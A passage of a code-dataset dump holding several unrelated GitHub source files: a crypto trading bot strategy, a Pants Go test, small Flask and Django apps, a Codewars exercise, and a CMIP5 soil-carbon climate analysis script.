Bot.Strategy.EntryStrategy import EntryStrategy, ExitStrategy\nfrom Bot.Strategy.PlaceOrderStrategy import PlaceOrderStrategy\nfrom Bot.Strategy.StopLossStrategy import StopLossStrategy\nfrom Bot.Strategy.TradingStrategy import TradingStrategy\nfrom Bot.Target import Target\nfrom Bot.Trade import Trade\n\n\nclass TargetsAndStopLossStrategy(TradingStrategy):\n def __init__(self, trade: Trade, fx: FXConnector, trade_updated=None, balance=None):\n super().__init__(trade=trade, fx=fx, trade_updated=trade_updated, balance=balance)\n\n if trade.has_stoploss() or trade.has_stoploss_in_last_completed_target():\n self.create_sl_strategy(trade)\n else:\n self.strategy_sl = None\n\n self.strategy_entry = EntryStrategy(trade, fx, trade_updated, True, self.exchange_info, self.balance) \\\n if trade.has_entry() and not trade.entry.is_completed() else None\n\n if trade.has_exit() and not trade.exit.is_completed():\n self.create_exit_strategy(trade)\n else:\n self.strategy_exit = None\n\n\n def describe(self, describe_trade=True):\n description = '***{}***'.format(self.__str__())\n if describe_trade:\n description += '\\nTrade: \\n{0}'.format(self.trade.describe())\n\n return description\n\n def create_sl_strategy(self, trade):\n self.strategy_sl = StopLossStrategy(trade, self.fx, self.trade_updated, True, self.exchange_info, self.balance)\n\n def create_exit_strategy(self, trade):\n self.strategy_exit = PlaceOrderStrategy(trade, self.fx, self.trade_updated, True, self.exchange_info,\n self.balance)\n # if trade.exit.type.is_smart():\n # self.strategy_exit = ExitStrategy(trade, self.fx, self.trade_updated, True, self.exchange_info,\n # self.balance)\n # elif trade.exit.type.is_target():\n\n\n def update_trade(self, trade: Trade):\n super().update_trade(trade)\n self.last_execution_price = 0\n\n # [s.update_trade(trade) for s in self.all_strategies()]\n if trade.has_stoploss() or trade.has_stoploss_in_last_completed_target():\n if self.strategy_sl:\n self.strategy_sl.update_trade(trade)\n else:\n self.strategy_sl = self.create_sl_strategy(trade)\n else:\n self.strategy_sl = None\n\n # new trade has exit\n if trade.has_exit():\n if self.strategy_exit:\n self.strategy_exit.update_trade(trade)\n else:\n self.create_exit_strategy(trade)\n else:\n self.strategy_exit = None\n\n if trade.has_entry():\n if self.strategy_entry and trade.is_new():\n self.strategy_entry.update_trade(trade)\n else:\n self.strategy_entry = None\n\n def execute(self, new_price):\n if self.is_completed():\n self.logInfo('Trade Complete')\n return\n\n self.last_price = new_price\n\n if (self.strategy_sl and self.strategy_sl.is_completed()) \\\n or (self.strategy_exit and self.strategy_exit.is_completed()):\n self.set_trade_completed()\n return\n\n # self.log_price(new_price)\n\n if new_price == self.last_execution_price:\n return\n\n self.last_execution_price = new_price\n\n if self.trade.status.is_new():\n if self.strategy_entry:\n self.strategy_entry.execute(new_price)\n # # implementy market entry\n # self.trade.status = OrderStatus.ACTIVE\n # self.trade_updated(self.trade)\n else: # if no entry is needed\n self.trade.set_active()\n self.trigger_target_updated()\n\n if self.trade.status.is_active():\n sl_active = False\n if self.strategy_sl:\n self.strategy_sl.execute(new_price)\n sl_active = self.strategy_sl.is_stoploss_order_active()\n\n if self.strategy_exit and not sl_active:\n self.strategy_exit.execute(new_price)\n\n def on_order_status_changed(self, t: Target, data):\n complete_trade = False\n\n if t.is_completed():\n if t.is_entry_target():\n # validate balance and activate trade only if there are trading targets\n if self.strategy_exit:\n AccountBalances().update_balances(self.fx.get_all_balances_dict())\n self.trade.cap = self.get_balance_for_side().avail\n self.trade.set_active()\n self.trigger_target_updated()\n else:\n complete_trade = True\n elif t.is_exit_target():\n if self.trade.exit and self.trade.exit.is_completed():\n # if all targets are completed, set trade as completed\n complete_trade = True\n elif t.is_stoploss_target():\n complete_trade = True\n\n if complete_trade:\n self.set_trade_completed()\n\n [s.on_order_status_changed(t, data) for s in self.all_strategies()]\n # if self.strategy_sl:\n # self.strategy_sl.order_status_changed(t, data)\n #\n # if self.strategy_exit:\n # self.strategy_exit.order_status_changed(t, data)\n #\n # if self.strategy_entry:\n # self.strategy_entry.order_status_changed(t, data)\n\n def all_strategies(self):\n s = []\n if self.strategy_sl:\n s.append(self.strategy_sl)\n\n if self.strategy_exit:\n s.append(self.strategy_exit)\n\n if self.strategy_entry:\n s.append(self.strategy_entry)\n\n return s\n\n def emergent_close_position(self):\n try:\n self.cancel_all_open_orders()\n\n AccountBalances().update_balances(self.fx.get_all_balances_dict())\n\n # price = self.exchange_info.adjust_price(self.get_sl_limit_price())\n bal = self.trade.get_cap(self.get_balance_for_side().avail)\n\n volume = round(bal / self.get_single_price(self.last_price), 8) if self.trade_side().is_buy() else bal\n\n if volume < self.exchange_info.minQty:\n adjusted_vol = 0\n else:\n adjusted_vol = self.exchange_info.adjust_quanity(volume)\n\n self.logInfo(\n 'Closing positions ({}): {}, v: {:.08f}'.format(self.symbol(), self.trade_side(), adjusted_vol))\n\n if adjusted_vol > 0:\n order = self.fx.create_makret_order(self.symbol(),\n self.trade_side().name,\n adjusted_vol)\n\n self.logInfo('Positions [{}] Closed'.format(self.symbol()))\n self.trade.set_completed()\n self.trigger_target_updated()\n except BinanceAPIException as bae:\n self.logError(str(bae))\n\n","repo_name":"iilunin/crypto-bot","sub_path":"Bot/Strategy/TargetsAndStopLossStrategy.py","file_name":"TargetsAndStopLossStrategy.py","file_ext":"py","file_size_in_byte":7203,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"37"} +{"seq_id":"29115250944","text":"from __future__ import annotations\n\nfrom textwrap import dedent\nfrom typing import Iterable\n\nimport pytest\n\nfrom pants.backend.go import target_type_rules\nfrom pants.backend.go.target_types import GoModTarget\nfrom pants.backend.go.util_rules import (\n assembly,\n build_pkg,\n first_party_pkg,\n go_mod,\n link,\n sdk,\n third_party_pkg,\n)\nfrom pants.backend.go.util_rules.first_party_pkg import (\n FallibleFirstPartyPkgInfo,\n FirstPartyPkgInfoRequest,\n)\nfrom pants.engine.addresses import Address\nfrom pants.engine.fs import PathGlobs, Snapshot\nfrom pants.engine.rules import QueryRule\nfrom pants.testutil.rule_runner import RuleRunner, engine_error\n\n\n@pytest.fixture\ndef rule_runner() -> RuleRunner:\n rule_runner = RuleRunner(\n rules=[\n *go_mod.rules(),\n *first_party_pkg.rules(),\n *sdk.rules(),\n *third_party_pkg.rules(),\n *target_type_rules.rules(),\n *build_pkg.rules(),\n *link.rules(),\n *assembly.rules(),\n QueryRule(FallibleFirstPartyPkgInfo, [FirstPartyPkgInfoRequest]),\n ],\n target_types=[GoModTarget],\n )\n rule_runner.set_options([], env_inherit={\"PATH\"})\n return rule_runner\n\n\ndef test_package_info(rule_runner: RuleRunner) -> None:\n rule_runner.write_files(\n {\n \"foo/BUILD\": \"go_mod()\\n\",\n \"foo/go.mod\": dedent(\n \"\"\"\\\n module go.example.com/foo\n go 1.16\n require github.com/google/uuid v1.3.0\n require (\n rsc.io/quote v1.5.2\n golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c // indirect\n rsc.io/sampler v1.3.0 // indirect\n )\n \"\"\"\n ),\n \"foo/go.sum\": dedent(\n \"\"\"\\\n github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I=\n github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=\n golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c h1:qgOY6WgZOaTkIIMiVjBQcw93ERBE4m30iBm00nkL0i8=\n golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=\n rsc.io/quote v1.5.2 h1:w5fcysjrx7yqtD/aO+QwRjYZOKnaM9Uh2b40tElTs3Y=\n rsc.io/quote v1.5.2/go.mod h1:LzX7hefJvL54yjefDEDHNONDjII0t9xZLPXsUe+TKr0=\n rsc.io/sampler v1.3.0 h1:7uVkIFmeBqHfdjD+gZwtXXI+RODJ2Wc4O7MPEh/QiW4=\n rsc.io/sampler v1.3.0/go.mod h1:T1hPZKmBbMNahiBKFy5HrXp6adAjACjK9JXDnKaTXpA=\n \"\"\"\n ),\n \"foo/pkg/foo.go\": dedent(\n \"\"\"\\\n package pkg\n import \"github.com/google/uuid\"\n import \"rsc.io/quote\"\n\n func Grok() string {\n return \"Hello World\"\n }\n \"\"\"\n ),\n \"foo/cmd/main.go\": dedent(\n \"\"\"\\\n package main\n import (\n \"fmt\"\n \"go.example.com/foo/pkg\"\n )\n func main() {\n fmt.Printf(\"%s\\n\", pkg.Grok())\n }\n \"\"\"\n ),\n \"foo/cmd/bar_test.go\": dedent(\n \"\"\"\\\n package main\n import \"testing\"\n func TestBar(t *testing.T) {}\n \"\"\"\n ),\n }\n )\n\n def assert_info(\n subpath: str,\n *,\n imports: list[str],\n test_imports: list[str],\n xtest_imports: list[str],\n go_files: list[str],\n test_files: list[str],\n xtest_files: list[str],\n embed_patterns: Iterable[str] = (),\n test_embed_patterns: Iterable[str] = (),\n xtest_embed_patterns: Iterable[str] = (),\n ) -> None:\n maybe_info = rule_runner.request(\n FallibleFirstPartyPkgInfo,\n [FirstPartyPkgInfoRequest(Address(\"foo\", generated_name=f\"./{subpath}\"))],\n )\n assert maybe_info.info is not None\n info = maybe_info.info\n actual_snapshot = rule_runner.request(Snapshot, [info.digest])\n expected_snapshot = rule_runner.request(Snapshot, [PathGlobs([f\"foo/{subpath}/*.go\"])])\n assert actual_snapshot == expected_snapshot\n\n assert info.imports == tuple(imports)\n assert info.test_imports == tuple(test_imports)\n assert info.xtest_imports == tuple(xtest_imports)\n assert info.go_files == tuple(go_files)\n assert info.test_files == tuple(test_files)\n assert info.xtest_files == tuple(xtest_files)\n assert not info.s_files\n\n assert info.minimum_go_version == \"1.16\"\n\n assert info.embed_patterns == tuple(embed_patterns)\n assert info.test_embed_patterns == tuple(test_embed_patterns)\n assert info.xtest_embed_patterns == tuple(xtest_embed_patterns)\n\n assert_info(\n \"pkg\",\n imports=[\"github.com/google/uuid\", \"rsc.io/quote\"],\n test_imports=[],\n xtest_imports=[],\n go_files=[\"foo.go\"],\n test_files=[],\n xtest_files=[],\n )\n assert_info(\n \"cmd\",\n imports=[\"fmt\", \"go.example.com/foo/pkg\"],\n test_imports=[\"testing\"],\n xtest_imports=[],\n go_files=[\"main.go\"],\n test_files=[\"bar_test.go\"],\n xtest_files=[],\n )\n\n\ndef test_invalid_package(rule_runner) -> None:\n rule_runner.write_files(\n {\n \"BUILD\": \"go_mod(name='mod')\\n\",\n \"go.mod\": dedent(\n \"\"\"\\\n module go.example.com/foo\n go 1.17\n \"\"\"\n ),\n \"bad.go\": \"invalid!!!\",\n }\n )\n maybe_info = rule_runner.request(\n FallibleFirstPartyPkgInfo,\n [FirstPartyPkgInfoRequest(Address(\"\", target_name=\"mod\", generated_name=\"./\"))],\n )\n assert maybe_info.info is None\n assert maybe_info.exit_code == 1\n assert \"bad.go:1:1: expected 'package', found invalid\\n\" in maybe_info.stderr\n\n\n@pytest.mark.xfail(reason=\"cgo is ignored\")\ndef test_cgo_not_supported(rule_runner: RuleRunner) -> None:\n rule_runner.write_files(\n {\n \"BUILD\": \"go_mod(name='mod')\\n\",\n \"go.mod\": dedent(\n \"\"\"\\\n module go.example.com/foo\n go 1.17\n \"\"\"\n ),\n \"hello.go\": dedent(\n \"\"\"\\\n package main\n\n // int fortytwo()\n // {\n //\t return 42;\n // }\n import \"C\"\n import \"fmt\"\n\n func main() {\n f := C.intFunc(C.fortytwo)\n fmt.Println(C.intFunc(C.fortytwo))\n }\n \"\"\"\n ),\n }\n )\n with engine_error(NotImplementedError):\n rule_runner.request(\n FallibleFirstPartyPkgInfo,\n [FirstPartyPkgInfoRequest(Address(\"\", target_name=\"mod\", generated_name=\"./\"))],\n )\n\n\ndef test_embeds_supported(rule_runner: RuleRunner) -> None:\n rule_runner.write_files(\n {\n \"BUILD\": \"go_mod(name='mod')\\n\",\n \"go.mod\": dedent(\n \"\"\"\\\n module go.example.com/foo\n go 1.17\n \"\"\"\n ),\n \"grok.txt\": \"This will be embedded in a Go binary.\\n\",\n \"test_grok.txt\": \"This will be embedded in a Go binary.\\n\",\n \"xtest_grok.txt\": \"This will be embedded in a Go binary.\\n\",\n \"foo.go\": dedent(\n \"\"\"\\\n package foo\n import _ \"embed\"\n //go:embed grok.txt\n var message\n \"\"\"\n ),\n \"foo_test.go\": dedent(\n \"\"\"\\\n package foo\n import _ \"embed\"\n //go:embed test_grok.txt\n var testMessage\n \"\"\"\n ),\n \"bar_test.go\": dedent(\n \"\"\"\\\n package foo_test\n import _ \"embed\"\n //go:embed xtest_grok.txt\n var testMessage\n \"\"\"\n ),\n }\n )\n maybe_info = rule_runner.request(\n FallibleFirstPartyPkgInfo,\n [FirstPartyPkgInfoRequest(Address(\"\", target_name=\"mod\", generated_name=\"./\"))],\n )\n assert maybe_info.info is not None\n info = maybe_info.info\n assert info.embed_patterns == (\"grok.txt\",)\n assert info.test_embed_patterns == (\"test_grok.txt\",)\n assert info.xtest_embed_patterns == (\"xtest_grok.txt\",)\n","repo_name":"akk5597/pants","sub_path":"src/python/pants/backend/go/util_rules/first_party_pkg_test.py","file_name":"first_party_pkg_test.py","file_ext":"py","file_size_in_byte":8749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"21196579424","text":"from flask import Flask, render_template\nfrom jinja2 import StrictUndefined\nfrom pprint import pprint\nimport requests, json\n\napp = Flask(__name__)\n\n# Flask Sessions and Debug Toolbar\napp.secret_key = 'omnislash'\napp.jinja_env.undefined = StrictUndefined\n\n# Routes\n@app.route('/')\ndef home():\n return 'work in progress'\n\n# Test calls\n# Pokemon info is accessed by a pokemon's number. Ex: bulbasaur == 1\nurl = 'https://pokeapi.co/api/v2/pokemon/1/'\npokemon_api = requests.get(url)\n\n# Front pokemon sprite image url\npprint(pokemon_api.json()['sprites']['front_default'])\n\n# Pokemon name\npprint(pokemon_api.json()['name'])\n\n\n# Pokemon types (fire, water, grass, etc)\npokemon_types = pokemon_api.json()['types']\nfor types in pokemon_types:\n pprint(types['type']['name'])\n\n\n\n\n\n###########################\nif __name__ == \"__main__\":\n app.debug = True\n\n\n app.run(host=\"0.0.0.0\")","repo_name":"kumsy/pokedex","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16530986940","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r\"^sa/schedA$\", views.schedA, name=\"schedA\"),\n url(\n r\"^sa/contribution_aggregate$\",\n views.contribution_aggregate,\n name=\"contribution_aggregate\",\n ),\n url(\n r\"^sa/force_aggregate_sa$\", views.force_aggregate_sa, name=\"force_aggregate_sa\"\n ),\n url(\n r\"^sa/force_unaggregate_sa$\",\n views.force_unaggregate_sa,\n name=\"force_unaggregate_sa\",\n ),\n url(\n r\"^sa/force_itemize_sa$\", views.force_itemize_sa, name=\"force_itemize_sa\"\n ),\n url(\n r\"^sa/force_unitemize_sa$\",\n views.force_unitemize_sa,\n name=\"force_unitemize_sa\",\n ),\n # This API was brought in from CORE APP as it used few sched_A functions which were conflicting usage\n url(\n r\"^core/trash_restore_transactions$\",\n views.trash_restore_transactions,\n name=\"trash_restore_transactions\",\n ),\n url(\n r\"^sa/get_report_id_from_date$\",\n views.get_report_id_from_date,\n name=\"get_report_id_from_date\",\n ),\n]\n","repo_name":"albertcrowley/fecfile-web-api","sub_path":"django-backend/fecfiler/sched_A/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"6823581251","text":"#Write a function that will return the count of distinct \n#case-insensitive alphabetic characters and numeric digits \n#that occur more than once in the input string. \n#The input string can be assumed to contain only alphabets (both uppercase and lowercase) and numeric digits.\n\ndef duplicate_count(text):\n letters_numbers = {\n 'A':0,'B':0,'C':0,'D':0,'E':0,'F':0,'G':0,'H':0,'I':0,'J':0,'K':0,'L':0,'M':0,'N':0,\n 'O':0,'P':0,'Q':0,'R':0,'S':0,'T':0,'U':0,'V':0,'W':0,'X':0,'Y':0,'Z':0,\n '0':0,'1':0,'2':0,'3':0,'4':0,'5':0,'6':0,'7':0,'8':0,'9':0\n }\n for char in text.upper():\n letters_numbers[char] += 1\n count = 0\n for char in letters_numbers:\n if letters_numbers[char] >= 2:\n count +=1\n return count\n\ndef duplicate_count_2(text):\n seen = set()\n duples = set()\n for char in text:\n char = char.lower()\n if char in seen:\n duples.add(char)\n seen.add(char)\n return len(duples)\n\ndef duplicate_count_3(text):\n duply_count = 0\n text=text.lower()\n for i in set(text):\n if text.count(i) > 1:\n duply_count += 1\n return duply_count\n\nprint (duplicate_count('abcde'))\nprint (duplicate_count('aabbcde'))","repo_name":"berg96/CodeWars","sub_path":"Counting Duplicates(CW).py","file_name":"Counting Duplicates(CW).py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17506534264","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Thu Feb 6 13:46:43 2020\n@author: Rebecca Varney, University of Exeter (rmv203@exeter.ac.uk)\n\nAnalysis Python Script for Varney et al. 2020 Nature Communications\n- script finds model soil turnover time (tau_s) calculated using model output and then subsequent modelled change in\nsoil carbon (model deltaCs,tau), and relationship-derived change in soil carbon (relationship-derived deltaCs,tau),\nwhich is calculated using the model-specific spatial temperature sensitivities of tau (quadratic fits) and model temperature\n- calculated for CMIP5 models\n- investigating if relationship-derived deltaCs,tau and model deltaCs,tau are similar (on one-to-one line)\nfor each model considered in this study\n- pofp_analysis: change is considered between time averaged historical (1995-2005) and then time averaged at the\n end of a future RCP scenario (2090-2100)\n\"\"\"\n\n#%%\n\n# Analysis imports\nimport numpy as np\nimport numpy.ma as ma\n\n# My functions\nfrom rmv_cmip_analysis import combine_netCDF_cmip5\nfrom rmv_cmip_analysis import open_netCDF\nfrom rmv_cmip_analysis import select_time\nfrom rmv_cmip_analysis import time_average\nfrom rmv_cmip_analysis import numpy_to_cube\nfrom rmv_cmip_analysis import global_total_percentage\n\n\n#%%\n#inputs\n\n# historical / present day dates\nlower_historical = 1995\nupper_historical = 2005\n# future dates\nlower = 2090\nupper = 2100\n\n\n# CMIP5 models\ncmip5_models = ['BNU-ESM', 'CanESM2', 'CESM1-CAM5', 'GFDL-ESM2G', 'GISS-E2-R', 'HadGEM2-ES', 'IPSL-CM5A-LR', 'MIROC-ESM', 'NorESM1-M']\nn_models = len(cmip5_models)\nmodel_shapes = ['o', '^', 'v', '1', 's', '*', 'x', '+', 'd']\n\n# RCP senarios\nrcp_options = ['rcp26', 'rcp45', 'rcp85']\nrcp_options_length = len(rcp_options)\n\n\n# defining empty numpy array to save values\nx_array = ma.zeros((len(rcp_options), len(cmip5_models)))\ny_array = ma.zeros((len(rcp_options), len(cmip5_models)))\n\n\n#%%\n# Loop through each rcp run being considered\nfor rcp_option in range(0, rcp_options_length):\n rcp = rcp_options[rcp_option] # selecting the rcp scenario\n\n # for loop for each CMIP5 model\n for model_i in range(0, n_models):\n model = cmip5_models[model_i] # seleting the models\n\n print(rcp, model)\n\n\n #%% historical soil turnover time\n\n # Heterotrophic Respiration (RH)\n rh_historical_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/rh_Lmon_'+model+'_historical*', 'heterotrophic_respiration_carbon_flux', model)\n rh_historical_cube = open_netCDF(rh_historical_cube)\n # Soil Carbon (cSoil)\n cSoil_historical_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/cSoil_Lmon_'+model+'_historical*', 'soil_carbon_content', model)\n cSoil_historical_cube = open_netCDF(cSoil_historical_cube)\n # Near Surface Air Temperature (tas)\n tas_historical_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/tas_Amon_'+model+'_historical*', 'air_temperature', model)\n tas_historical_cube = open_netCDF(tas_historical_cube)\n\n # Select historical time period\n rh_historical_cube = select_time(rh_historical_cube, lower_historical, upper_historical)\n cSoil_historical_cube = select_time(cSoil_historical_cube, lower_historical, upper_historical)\n tas_historical_cube = select_time(tas_historical_cube, lower_historical, upper_historical)\n # Time average\n rh_historical_cube = time_average(rh_historical_cube)\n cSoil_historical_cube = time_average(cSoil_historical_cube)\n tas_historical_cube = time_average(tas_historical_cube)\n # Converting from cubes to numpy_arrays\n rh_historical_data = rh_historical_cube.data\n cSoil_historical_data = cSoil_historical_cube.data\n tas_historical_data = tas_historical_cube.data\n\n # save to use later\n historical_tas_save_data = tas_historical_data - 273.15\n cSoil_historical_save_cube = cSoil_historical_cube.copy()\n historical_rh_save_data = rh_historical_data*86400.*365.\n\n\n # Calculating Soil Turnover Time (tau_s)\n tau_s_data_historical = cSoil_historical_data / (rh_historical_data*86400.*365.)\n tau_s_masked_data_historical = ma.masked_where(np.logical_or(tau_s_data_historical < 1, tau_s_data_historical > 1e4), tau_s_data_historical)\n\n\n #%% finding the spatial relationship\n\n # masking tas data with corresponding mask\n tas_historical_data = ma.masked_where(np.logical_or(tau_s_data_historical < 1, tau_s_data_historical > 1e4), tas_historical_data)\n # changing the x variable air temperature to celcius from kelvin\n xvar_historical = tas_historical_data - 273.15\n\n # define x and y and flatten\n x = xvar_historical.flatten()\n y = tau_s_masked_data_historical.flatten()\n y = ma.log(y) # numpy masked log of y\n\n # model-specific quadratic relationship\n p = np.ma.polyfit(x, y, 2)\n poly_relationship = np.poly1d(p)\n\n\n #%% finding estimated Cs\n\n # historical\n tau_s_historical_estimated = poly_relationship(historical_tas_save_data)\n\n # future\n tas_future_cube = combine_netCDF_cmip5('/home/links/rmv203/cmip5_data/tas_Amon_'+model+'_'+rcp+'_*', 'air_temperature', model)\n tas_future_cube = open_netCDF(tas_future_cube)\n # select time\n tas_future_cube = select_time(tas_future_cube, lower, upper)\n # time average\n tas_future_cube = time_average(tas_future_cube)\n # cube to numpy array\n tas_future_data = tas_future_cube.data\n # K to C degrees\n tas_future_data = tas_future_data - 273.15\n # estimating future tau_s with polynomial relationship\n tau_s_future_estimated = poly_relationship(tas_future_data)\n\n # estimated delta tau_s\n delta_tau_estimated = ma.exp(tau_s_future_estimated) - ma.exp(tau_s_historical_estimated)\n # estimated delta soil carbon (relationship-derived deltaCs,tau)\n delta_c_soil_estimated = delta_tau_estimated*historical_rh_save_data\n\n\n #%% finding model Cs\n\n # historical\n tau_historical_model = tau_s_masked_data_historical.copy()\n\n # future\n # Heterotrophic Respiration (RH)\n rh_future_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/rh_Lmon_'+model+'_'+rcp+'*', 'heterotrophic_respiration_carbon_flux', model)\n rh_future_cube = open_netCDF(rh_future_cube)\n # Soil Carbon (cSoil)\n cSoil_future_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/cSoil_Lmon_'+model+'_'+rcp+'*', 'soil_carbon_content', model)\n cSoil_future_cube = open_netCDF(cSoil_future_cube)\n # Select future time period\n rh_future_cube = select_time(rh_future_cube, lower, upper)\n cSoil_future_cube = select_time(cSoil_future_cube, lower, upper)\n # Time average\n rh_future_cube = time_average(rh_future_cube)\n cSoil_future_cube = time_average(cSoil_future_cube)\n # Converting from cubes to numpy_arrays\n rh_future_data = rh_future_cube.data\n cSoil_future_data = cSoil_future_cube.data\n # Calculating future soil turnover time\n tau_s_data = cSoil_future_data / (rh_future_data*86400.*365.)\n tau_s_masked_data = ma.masked_where(np.logical_or(tau_s_data < 1, tau_s_data > 1e4), tau_s_data)\n tau_future_model = tau_s_masked_data.copy()\n\n # Modelled delta tau_s\n delta_tau_model = tau_future_model - tau_historical_model\n # calculating delta soil carbon (model deltaCs,tau)\n delta_c_soil_model = delta_tau_model*historical_rh_save_data\n\n\n #%%\n # Calculating the global averaged value of both delta Cs\n\n # Masking invalid values\n delta_c_soil_estimated = np.ma.masked_invalid(delta_c_soil_estimated)\n delta_c_soil_model = np.ma.masked_invalid(delta_c_soil_model)\n # convert numpy array to cube\n delta_c_soil_model_cube = numpy_to_cube(delta_c_soil_model, cSoil_historical_save_cube, 2)\n delta_c_soil_estimated_cube = numpy_to_cube(delta_c_soil_estimated, cSoil_historical_save_cube, 2)\n # landfracs\n landfraction = combine_netCDF_cmip5('/home/rmv203/cmip5_data/sftlf_fx_'+model+'_*', 'land_area_fraction', model)\n # global totals\n model_delta_cSoil_global = global_total_percentage(delta_c_soil_model_cube, landfrac=landfraction, latlon_cons=None)\n model_delta_cSoil_global_data = model_delta_cSoil_global.data\n estimate_delta_cSoil_global = global_total_percentage(delta_c_soil_estimated_cube, landfrac=landfraction, latlon_cons=None)\n estimate_delta_cSoil_global_data = estimate_delta_cSoil_global.data\n\n\n # saving delta Cs values\n x_array[rcp_option, model_i] = estimate_delta_cSoil_global_data\n y_array[rcp_option, model_i] = model_delta_cSoil_global_data\n\n\n #%%\n # saving variables\n np.save('saved_variables/historical_tas_data_'+model+'.npy', historical_tas_save_data.data)\n np.save('saved_variables/historical_tas_mask_'+model+'.npy', historical_tas_save_data.mask)\n np.save('saved_variables/historical_rh_data_'+model+'.npy', historical_rh_save_data.data)\n np.save('saved_variables/historical_rh_mask_'+model+'.npy', historical_rh_save_data.mask)\n np.save('saved_variables/historical_modelled_tau_data_'+model+'.npy', tau_historical_model.data)\n np.save('saved_variables/historical_modelled_tau_mask_'+model+'.npy', tau_historical_model.mask)\n np.save('saved_variables/poly_relationship_'+model+'.npy', poly_relationship)\n\n\n#%%\n# saving data\n \n# looping through each rcp\nfor j in range(0, rcp_options_length):\n rcp = rcp_options[j]\n \n # saving x_array and y_array for each rcp\n np.savetxt(\"saved_data/x_\"+str(rcp)+\"_cmip5.csv\", x_array[j,:], delimiter=\",\")\n np.savetxt(\"saved_data/y_\"+str(rcp)+\"_cmip5.csv\", y_array[j,:], delimiter=\",\")\n \n # saving the r coefficient for x_array and y_array for each rcp\n r_coeffient = ma.corrcoef(x_array[j,:], y_array[j,:])\n print('CMIP5 r-coefficent:', rcp, r_coeffient)\n np.savetxt(\"saved_data/cmip5_xy_rcoefficient_\"+str(rcp)+\".csv\", r_coeffient, delimiter=\",\")\n \n # saving mean delta Cs from CMIP5 models for each rcp\n mean_delta_Cs_cmip5 = np.nanmean(y_array[j,:])\n mean_delta_Cs_cmip5 = np.array([mean_delta_Cs_cmip5])\n print('CMIP5 delta Cs mean:', rcp, mean_delta_Cs_cmip5)\n np.savetxt(\"saved_data/cmip5_mean_model_deltaCs_\"+str(rcp)+\".csv\", mean_delta_Cs_cmip5, delimiter=\",\")\n \n # saving std in delta Cs from CMIP5 models for each rcp\n std_delta_Cs_cmip5 = np.nanstd(y_array[j,:])\n std_delta_Cs_cmip5 = np.array([std_delta_Cs_cmip5])\n print('CMIP5 delta Cs std:', rcp, std_delta_Cs_cmip5)\n np.savetxt(\"saved_data/cmip5_std_model_deltaCs_\"+str(rcp)+\".csv\", std_delta_Cs_cmip5, delimiter=\",\")\n \n\n# saving over all rcp runs\n \n# saving the r coefficient for x_array and y_array\nx_array_flatten = x_array.flatten()\ny_array_flatten = y_array.flatten()\nr_coeffient = ma.corrcoef(x_array_flatten, y_array_flatten)\nprint('CMIP5 all rcps r-coefficent:', r_coeffient)\nnp.savetxt(\"saved_data/cmip5_xy_rcoefficient_allrcps.csv\", r_coeffient, delimiter=\",\")\n\n# saving mean delta Cs from CMIP5 models\nmean_delta_Cs_cmip5 = np.nanmean(y_array)\nmean_delta_Cs_cmip5 = np.array([mean_delta_Cs_cmip5])\nprint('CMIP5 delta Cs mean (all rcps):', mean_delta_Cs_cmip5)\nnp.savetxt(\"saved_data/cmip5_mean_model_deltaCs_allrcps.csv\", mean_delta_Cs_cmip5, delimiter=\",\")\n\n# saving std in delta Cs from CMIP5 models\nstd_delta_Cs_cmip5 = np.nanstd(y_array)\nstd_delta_Cs_cmip5 = np.array([std_delta_Cs_cmip5])\nprint('CMIP5 delta Cs std (all rcps):', std_delta_Cs_cmip5)\nnp.savetxt(\"saved_data/cmip5_std_model_deltaCs_allrcps.csv\", std_delta_Cs_cmip5, delimiter=\",\")\n","repo_name":"rebeccamayvarney/soiltau_ec","sub_path":"pofp_cmip5_analysis.py","file_name":"pofp_cmip5_analysis.py","file_ext":"py","file_size_in_byte":11855,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"39385461036","text":"import flask\nfrom flask import *\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom nlp import Ngrams, common\n\nimport requests\nimport os\nimport sys\n\nfrom datetime import datetime\nimport csv\nimport threading\nimport socket\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napplication = Flask(__name__)\napplication.config[\"DEBUG\"] = True\napplication.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + \\\n os.path.join(basedir, \"db.sqlite\")\napplication.secret_key = 'not_so_secret'\n\ndb = SQLAlchemy(application)\n\n# Database #\n\n\nclass User(db.Model):\n email = db.Column(db.Text(), primary_key=True)\n username = db.Column(db.Text(), primary_key=True)\n password = db.Column(db.Text())\n name = db.Column(db.Text())\n number = db.Column(db.Integer())\n\n\n# class Test(db.Model):\n# test_id = db.Column(db.Integer, primary_key=True)\n# test_name = db.Column(db.Text())\n# creator = db.Column(db.Text, db.ForeignKey(\"user.username\"))\n\n\n# class Question(db.Model):\n# question_id = db.Column(db.Integer(), primary_key=True)\n# # test_id = db.Column(db.Integer, db.ForeignKey(\n# # \"test.test_id\"), primary_key=True)\n# question = db.Column(db.Integer(), primary_key=True)\n# answer = db.Column(db.Text())\n# marks = 